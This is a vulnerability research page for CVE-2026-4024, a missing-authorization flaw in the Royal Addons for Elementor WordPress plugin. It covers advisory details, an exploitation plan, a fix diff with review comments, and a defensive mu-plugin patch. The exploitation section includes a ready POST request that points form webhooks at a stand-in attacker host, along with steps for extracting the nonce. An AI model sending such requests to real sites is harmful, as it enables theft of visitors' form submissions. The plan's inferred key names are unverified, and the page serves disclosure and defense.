# CVE-2026-4024: Royal Addons for Elementor <= 1.7.1056 - Missing Authorization to Unauthenticated Form Action Meta Modification

- **Plugin slug:** `royal-elementor-addons` (plugin, not a theme)
- **URL slug:** `royal-addons-for-elementor-missing-authorization-to-unauthenticated-form-action-meta-modification`
- **Affected versions:** <= 1.7.1056
- **Patched in:** 1.7.1057
- **Vulnerability type:** Missing Authorization
- **Severity:** medium, CVSS 5.3 (`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N`)
- **Published:** 2026-05-01 20:11:49
- **Updated:** 2026-05-02 08:27:05
- **Days to patch:** 1
- **Reference:** https://www.wordfence.com/threat-intel/vulnerabilities/id/2ecec7d7-d1b2-4ccf-ade6-1f78224968c6?source=api-prod

## Description

The Royal Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `wpr_update_form_action_meta` AJAX action in all versions up to, and including, 1.7.1056. The handler is registered on both the `wp_ajax` and `wp_ajax_nopriv` hooks, so it is reachable by unauthenticated users. A nonce is verified, but that nonce (`wpr-addons-js`) is exposed in frontend JavaScript as `WprConfig.nonce` on any page that loads Royal Addons widgets, which makes the check ineffective as an access control: a nonce proves that a request was formed from a page the server handed out, not that the caller is authorized. The endpoint performs no capability or ownership check and calls `update_post_meta()` with user-controlled input on a whitelisted set of form action meta keys.

This makes it possible for unauthenticated attackers to modify form action configuration metadata (email, submissions, Mailchimp and webhook settings) on any post, potentially leading to webhook and email action tampering and to data exfiltration via modified webhook URLs. Note that the CVSS vector scores confidentiality impact as none (C:N): the score covers the direct integrity impact, while the exfiltration path depends on form submissions that occur after the webhook has been redirected.

## Research status

- **Status:** researched, 3 rounds completed, not verified (`research_verified: false`)
- **Model used:** gemini-3-flash-preview, started 2026-05-04 17:08:09, completed 2026-05-04 17:08:29
- **Vulnerable code excerpt:** not recorded
- **Proof of concept:** none recorded (no PoC status, video, steps, Playwright script, exploit code, trace, or tested WordPress/PHP version)

## Research summary

The Royal Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `wpr_update_form_action_meta` AJAX action. An unauthenticated attacker can modify form configuration metadata, such as webhook URLs and email recipients, by using the publicly exposed nonce, potentially leading to the exfiltration of form submission data sent to the redirected webhook.

## Exploitation research plan

### 1. Vulnerability Summary

The Royal Addons for Elementor plugin (up to version 1.7.1056) registers the `wpr_update_form_action_meta` AJAX handler on both the `wp_ajax` and `wp_ajax_nopriv` hooks, making it accessible to unauthenticated users. The handler modifies post metadata without verifying that the requesting user may edit the post or its settings. It does perform a nonce check (`wpr-addons-js`), but the nonce is leaked to every visitor through the frontend `WprConfig.nonce` JavaScript variable, so the check does not restrict who can call the endpoint.

### 2. Attack Vector Analysis

- **Endpoint:** `/wp-admin/admin-ajax.php`
- **Action:** `wpr_update_form_action_meta`
- **HTTP Method:** `POST`
- **Authentication:** Unauthenticated
- **Required Parameters:**
    - `action`: `wpr_update_form_action_meta`
    - `nonce`: the value of the `wpr-addons-js` nonce (found in `WprConfig.nonce`)
    - `post_id`: the ID of the post or page to modify
    - `meta_key`: one of the whitelisted form action meta keys. The advisory does not name the keys; the names used in this plan (e.g. `wpr_form_webhook_url`, `wpr_form_email_to`) are inferred from the description and must be confirmed against the plugin source.
    - `meta_value`: the new value for the meta key (e.g. an attacker-controlled webhook URL)

### 3. Code Flow

1. **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with `action=wpr_update_form_action_meta`.
2. **Hook Execution:** WordPress triggers the handler registered on `wp_ajax_nopriv_wpr_update_form_action_meta`.
3. **Nonce Verification:** The handler verifies the `wpr-addons-js` nonce (the exact call, presumably `check_ajax_referer('wpr-addons-js', 'nonce')`, is inferred). Because the attacker supplies the nonce leaked on the frontend, this check passes.
4. **Authorization Check:** The handler has no `current_user_can()` call and no ownership check.
5. **Data Retrieval:** The handler reads `post_id`, `meta_key` and `meta_value` from `$_POST`.
6. **Sink:** After checking `meta_key` against a whitelist of form settings, the handler calls `update_post_meta($post_id, $meta_key, $meta_value)`.
7. **Result:** Metadata of a Royal Addons form (such as its webhook destination) is modified.

### 4. Nonce Acquisition Strategy

The nonce is localized for the plugin's frontend scripts. To obtain it:

1. **Identify Script Loading:** The plugin emits `WprConfig` on pages that use Royal Addons widgets (such as the Form Builder).
2. **Create Trigger Content:** Create a page containing such a widget (see section 6).
3. **Navigate and Extract:** Open the created page in a browser and read the nonce from the global object in the developer console:

```javascript
window.WprConfig?.nonce
```

Because the object is emitted in the page's HTML, the same value can also be extracted from the raw page source with curl and a regular expression; a browser is not required.

### 5. Exploitation Strategy

**Step 1: Discover or create a target.** Find an existing post ID or create a page to prove that its meta can be modified.

**Step 2: Get the nonce.** Load any frontend page where the plugin's script is active and extract `WprConfig.nonce`.

**Step 3: Modify the form settings.** Send a crafted AJAX request that redirects form submissions to an external listener.

**Request Details:**

- **URL:** `http://<target-site>/wp-admin/admin-ajax.php`
- **Method:** `POST`
- **Headers:** `Content-Type: application/x-www-form-urlencoded`
- **Body:**

```text
action=wpr_update_form_action_meta&nonce=[EXTRACTED_NONCE]&post_id=[TARGET_ID]&meta_key=wpr_form_webhook_url&meta_value=https://attacker-collector.com/leak
```

*(Note: `wpr_form_webhook_url` is a guess at a whitelisted key based on the description; see section 9 for alternatives.)*

### 6. Test Data Setup

1. **Install Plugin:** Ensure `royal-elementor-addons` v1.7.1056 is installed and active.
2. **Create Target Page:**

   ```bash
   wp post create --post_type=page --post_title="Royal Form Page" --post_status=publish --post_content='[wpr-form-builder]'
   ```

   The shortcode name is an assumption of this plan. If it does not render a Royal Addons widget, build the page with the Form Builder widget in the Elementor editor instead; any page that loads the plugin's frontend script exposes `WprConfig`.
3. **Note the ID:** Capture the ID of the created post (e.g. `123`).

### 7. Expected Results

- The AJAX request returns a success response (the exact format is not known; likely JSON `{"success": true}` or the string `1`).
- The post meta for the target ID is updated in the database.

### 8. Verification Steps

After sending the request, verify the database state with WP-CLI:

```bash
wp post meta get [TARGET_ID] wpr_form_webhook_url
```

**Success Condition:** The command prints `https://attacker-collector.com/leak`.

### 9. Alternative Approaches

If `wpr_form_webhook_url` is not the exact key name, try the following candidates for the whitelisted form action keys:

- `wpr_form_email_to` (modify where notification emails are sent)
- `wpr_form_mailchimp_api_key` (modify the Mailchimp integration)
- `_wpr_form_webhook_url` (check for an underscore prefix)

If the `WprConfig` object is not found on the homepage, check whether it is nested under another object, or search the plugin source for `wp_localize_script( ..., 'WprConfig', ... )` to confirm the localization handle and the pages on which it is enqueued.

## Exploit outline

1. **Nonce retrieval:** Load any frontend page where Royal Addons widgets are rendered and extract the `wpr-addons-js` nonce from the global `WprConfig.nonce` JavaScript variable.
2. **Target identification:** Identify the `post_id` of a post or page containing a Royal Addons form.
3. **Unauthorized modification:** Send an unauthenticated AJAX POST request to `/wp-admin/admin-ajax.php` with the action `wpr_update_form_action_meta`.
4. **Payload:** Include the extracted nonce, the target `post_id`, a whitelisted `meta_key` (such as `wpr_form_webhook_url`, inferred) and a malicious `meta_value` (e.g. an attacker-controlled listener URL).
5. **Verification:** On success, subsequent form submissions from that post are delivered to the attacker-controlled endpoint, allowing the submitted data to be intercepted.

## Source links

- **Type:** plugin
- **Vulnerable version:** 1.7.1056 ([browse](https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1056), [zip](https://downloads.wordpress.org/plugin/royal-elementor-addons.1.7.1056.zip))
- **Fixed version:** 1.7.1057 ([browse](https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1057), [zip](https://downloads.wordpress.org/plugin/royal-elementor-addons.1.7.1057.zip))
- **All tags:** https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags
- **Trac changeset URL:** none recorded

## Files changed between 1.7.1056 and 1.7.1057

- `admin/plugin-options.php`
- `admin/templates/library/wpr-templates-data.php`
- `assets/css/admin/editor.min.css`
- `assets/css/frontend.css`
- `assets/css/frontend.min.css`
- `assets/js/admin/editor.js`
- `assets/js/admin/editor.min.js`
- `assets/js/frontend.js`

## Fix diff (admin/plugin-options.php only, truncated)

```diff
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/royal-elementor-addons/1.7.1056/admin/plugin-options.php /home/deploy/wp-safety.org/data/plugin-versions/royal-elementor-addons/1.7.1057/admin/plugin-options.php
--- /home/deploy/wp-safety.org/data/plugin-versions/royal-elementor-addons/1.7.1056/admin/plugin-options.php	2026-04-03 11:57:32.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/royal-elementor-addons/1.7.1057/admin/plugin-options.php	2026-04-10 10:58:42.000000000 +0000
@@ -120,6 +120,8 @@
     register_setting('wpr-extension-settings', 'wpr-parallax-multi-layer');
     register_setting('wpr-extension-settings', 'wpr-custom-css');
     register_setting('wpr-extension-settings', 'wpr-display-conditions');
+    register_setting('wpr-extension-settings', 'wpr-equal-height');
+    // register_setting('wpr-extension-settings', 'wpr-column-slider');
     register_setting('wpr-extension-settings', 'wpr-sticky-section');
 
     // Element Toggle
@@ -1630,6 +1632,12 @@
                         echo '<br><span>Tip: Edit any Section > Navigate to Advanced tab</span>';
                     } elseif ( 'wpr-display-conditions' === $option_name ) {
                         echo '<br><span>Tip: Edit any Element > Navigate to Visibility tab</span>';
+                    } elseif ( 'wpr-column-slider' === $option_name ) {
+                        echo '<br><span>Tip: Edit any Section > Navigate to Advanced tab</span>';
+                        // echo '<a href="https://www.youtube.com" target="_blank">Watch Video Tutorial</a>';
+                    } elseif ( 'wpr-equal-height' === $option_name ) {
+                        echo '<br><span>Tip: Edit any Section > Navigate to Advanced tab</span>';
+                        // echo '<a href="https://www.youtube.com" target="_blank">Watch Video Tutorial</a>';
                     }
 ... (truncated)
```
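Review bot: The hunk at `@@ -120,6 +120,8 @@` only registers a new `wpr-equal-height` extension setting and leaves `register_setting('wpr-extension-settings', 'wpr-column-slider');` commented out; it contains no change to the `wpr_update_form_action_meta` handler, so the authorization fix this advisory describes is not in the displayed portion of the diff, and the handler's file is not among the eight changed files listed either. The page should show the hunk that adds the capability or ownership check to the AJAX handler, or state where it lives, before the diff is presented as the fix. The commented-out `register_setting` line should be deleted rather than shipped.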
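Review bot: In the hunk at `@@ -1630,6 +1632,12 @@`, both new `elseif` branches carry a commented-out `echo '<a href="https://www.youtube.com" target="_blank">Watch Video Tutorial</a>';` with a placeholder URL; dead code with a placeholder link should be removed or the real tutorial link filled in before release. The two branches also emit the identical Tip string and could be collapsed into one condition (`'wpr-column-slider' === $option_name || 'wpr-equal-height' === $option_name`). Like the first hunk, this is settings-page UI text and does not touch the missing-authorization issue.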
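The check the advisory says the handler is missing, expressed as an operational mitigation for a site that cannot yet move to 1.7.1057. This is an added example for this page, not code from the plugin or from the page's research output. Only the action name and the `wp_ajax`/`wp_ajax_nopriv` registration are taken from the advisory; everything else is an assumption: that the plugin's own handler runs at WordPress's default hook priority 10, that the target post ID arrives in the `post_id` POST field, that `edit_post` on that post is the right capability to require, and the helper name `cve_2026_4024_log`, which is hypothetical.

```php
<?php
/**
 * Plugin Name: Virtual patch for CVE-2026-4024 (example, not Royal Addons code)
 *
 * Drop this file into wp-content/mu-plugins/. It does not modify the plugin;
 * it hooks the same AJAX action at an earlier priority and refuses requests
 * that the original handler would have accepted on the strength of a nonce
 * alone.
 *
 * Assumptions (not taken from the advisory): the plugin's handler is added at
 * the default priority 10, the post ID is sent as `post_id`, and `edit_post`
 * on that post is the capability a legitimate caller must hold.
 */

// The AJAX action named in the advisory; the hook names derive from it.
const CVE_2026_4024_ACTION = 'wpr_update_form_action_meta';

/**
 * Unauthenticated callers never have a legitimate reason to rewrite form
 * action meta, so the nopriv hook is refused outright. Priority 0 runs before
 * the plugin's handler (assumed at priority 10), and wp_send_json_error()
 * terminates the request through wp_die(), so the vulnerable code is never
 * reached. A leaked nonce no longer buys the attacker anything.
 */
add_action( 'wp_ajax_nopriv_' . CVE_2026_4024_ACTION, function () {
    cve_2026_4024_log( 'blocked unauthenticated call' );
    wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
}, 0 );

/**
 * Authenticated callers get the check the handler lacked: they must be allowed
 * to edit the specific post whose meta they are changing. The nonce the plugin
 * already verifies proves intent (the request came from the site's own page),
 * not permission, so this check is needed even when the nonce is valid.
 */
add_action( 'wp_ajax_' . CVE_2026_4024_ACTION, function () {
    $post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;

    if ( ! $post_id || ! current_user_can( 'edit_post', $post_id ) ) {
        cve_2026_4024_log( 'blocked authenticated call without edit_post on post ' . $post_id );
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }
    // Permitted: fall through to the plugin's own handler at priority 10.
}, 0 );

/**
 * Minimal audit trail for incident response (hypothetical helper). With
 * WP_DEBUG_LOG enabled, error_log() writes to wp-content/debug.log by default;
 * ship that file to your log pipeline and alert on the [CVE-2026-4024] tag.
 */
function cve_2026_4024_log( string $message ): void {
    $ip = isset( $_SERVER['REMOTE_ADDR'] )
        ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) )
        : 'unknown';

    error_log( sprintf(
        '[CVE-2026-4024] %s (user=%d ip=%s)',
        $message,
        get_current_user_id(),
        $ip
    ) );
}
```

Every hit on the nopriv branch after deployment is an exploitation attempt worth correlating with the post IDs and meta keys in the request body; a site that finds entries there should also audit its existing form action meta, since the mu-plugin stops future writes but does not undo earlier ones.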